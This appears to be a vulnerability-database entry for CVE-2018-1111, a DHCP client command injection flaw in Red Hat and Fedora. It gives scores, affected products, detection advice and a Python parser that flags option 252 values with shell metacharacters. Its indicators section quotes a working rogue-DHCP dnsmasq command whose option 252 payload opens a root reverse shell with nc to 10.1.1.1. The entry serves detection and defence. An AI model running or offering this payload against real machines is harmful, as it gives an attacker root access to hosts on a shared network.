CVE-2018-1111
published 2018-05-17

CVE-2018-1111: DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script…

Priority: P2 (77) · Severity: high · CVSS 3.0 base score: 7.5
CVSS 3.0 vector: AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploited in the wild
EPSS: 94.46% (99.8th percentile)
DHCP packages in Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to a command injection flaw in the NetworkManager integration script included in the DHCP client. A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager and configured to obtain network configuration using the DHCP protocol.

Affected

26 ranges, 25 shown. Vendor / product pairs (the version-range and fixed-in values are not given here):
  • fedora / dhcp (1 range)
  • fedoraproject / fedora (3 ranges)
  • paloalto / pan-os (1 range)
  • red_hat / dhcp (2 ranges)
  • redhat / enterprise_linux (10 ranges)
  • redhat / enterprise_linux_desktop (2 ranges)
  • redhat / enterprise_linux_server (2 ranges)
  • redhat / enterprise_linux_workstation (2 ranges)
  • redhat / enterprise_virtualization (2 ranges)

Detection & IOCs (extracted from sources)

command: dnsmasq --interface=eth0 --bind-interfaces --except-interface=lo --dhcp-range=10.1.1.1,10.1.1.10,1h --conf-file=/dev/null --dhcp-option=6,10.1.1.1 --dhcp-option=3,10.1.1.1 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"
path: /etc/NetworkManager/dispatcher.d/11-dhclient
path: /var/lib/NetworkManager/dhclient-eth0.conf
command: (252, "x'&{payload} #".format(payload=self.payload))
  • Alert on execution of /etc/NetworkManager/dispatcher.d/11-dhclient spawning unexpected child processes (e.g., nc, bash, touch) with root privileges, as this is the script exploited by the vulnerability.
  • Detect the DHCP4_WPAD environment variable being set to a value containing shell metacharacters (', &, |, ;) before the 11-dhclient script is executed; the value of DHCP option 252 is passed to the script through this variable.
  • Palo Alto Networks customers can use IPS signature 40739 to detect/block exploitation attempts against this vulnerability.
  • Look for the pattern x'&<command> # in DHCP option 252 payloads on the wire; this is the canonical injection format used in both the PoC and Metasploit module.
  • It is important to note that other characters may be used to perform this attack, such as | or ;, in addition to the & character demonstrated in the primary PoC.
  • The vulnerability only affects systems where NetworkManager is running AND DHCP is configured as the network configuration method. Systems not using NetworkManager with DHCP are not impacted.
  • Red Hat Enterprise Virtualization 4.1 ships vulnerable components but is not impacted in its default configuration because NetworkManager is turned off in the Management Appliance and not used with DHCP in the Hypervisor.
  • RHEL 5 and RHEL 8 dhcp packages are NOT affected; only RHEL 6 and 7 (and derivatives such as CentOS 6/7, Fedora 26/27/28) are vulnerable.
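As an added example (not taken from the advisory sources, the PoC or the Metasploit module named above), a small Python parser for the DHCP options field that extracts option 252 from a captured DHCP message and flags values carrying the shell metacharacters listed in the detection notes; the three sample DHCPOFFER option fields are constructed, not real captures.

```python
import re

DHCP_MAGIC = b"\x63\x82\x53\x63"   # every DHCP options field begins with this cookie
OPT_PAD, OPT_END, OPT_MSG_TYPE, OPT_WPAD = 0, 255, 53, 252
# Metacharacters named in the detection notes above: the quote breaks out of the
# dispatcher script's single-quoted assignment, the others chain a second command.
SHELL_META = re.compile(r"['&|;]")
CANONICAL = re.compile(r"x'&.*#")  # the x'&<command> # form used by the PoC

def parse_dhcp_options(payload: bytes) -> dict:
    """Parse the TLV options field of a DHCP message into {code: value}."""
    if not payload.startswith(DHCP_MAGIC):
        raise ValueError("missing DHCP magic cookie")
    opts, i = {}, len(DHCP_MAGIC)
    while i < len(payload):
        code = payload[i]
        if code == OPT_PAD:          # single-byte padding, no length field
            i += 1
            continue
        if code == OPT_END:
            break
        if i + 2 > len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if len(value) != length:
            raise ValueError("truncated option value")
        opts[code] = opts.get(code, b"") + value  # RFC 3396: repeated options concatenate
        i += 2 + length
    return opts

def check_wpad_option(payload: bytes) -> "dict | None":
    """Return a finding when option 252 carries shell metacharacters, else None."""
    wpad = parse_dhcp_options(payload).get(OPT_WPAD)
    if wpad is None:
        return None
    text = wpad.decode("latin-1")
    hits = sorted(set(SHELL_META.findall(text)))
    if not hits:
        return None
    return {"value": text, "metachars": hits, "canonical_pattern": bool(CANONICAL.search(text))}

def build_options(items) -> bytes:
    """Encode [(code, value)] as an options field; used only to construct sample data."""
    return DHCP_MAGIC + b"".join(bytes([c, len(v)]) + v for c, v in items) + bytes([OPT_END])

# Constructed sample DHCPOFFER options (53 = message type, 2 = OFFER); not real captures.
BENIGN_OFFER = build_options([(OPT_MSG_TYPE, b"\x02"), (OPT_WPAD, b"http://wpad.example/wpad.dat")])
INJECTED_OFFER = build_options([(OPT_MSG_TYPE, b"\x02"), (OPT_WPAD, b"x'&id #")])
VARIANT_OFFER = build_options([(OPT_MSG_TYPE, b"\x02"), (OPT_WPAD, b"x';id #")])  # ; instead of &
```

The variant sample shows why the check keys on the metacharacter set rather than only the canonical `x'&` pattern, as the note on alternative characters above points out.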

CVSS provenance

NVD (CVSS v3.0): 7.5 HIGH, CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD (CVSS v2.0): 7.9 HIGH, AV:A/AC:M/Au:N/C:C/I:C/A:C
Vendor (Red Hat): 7.5 HIGH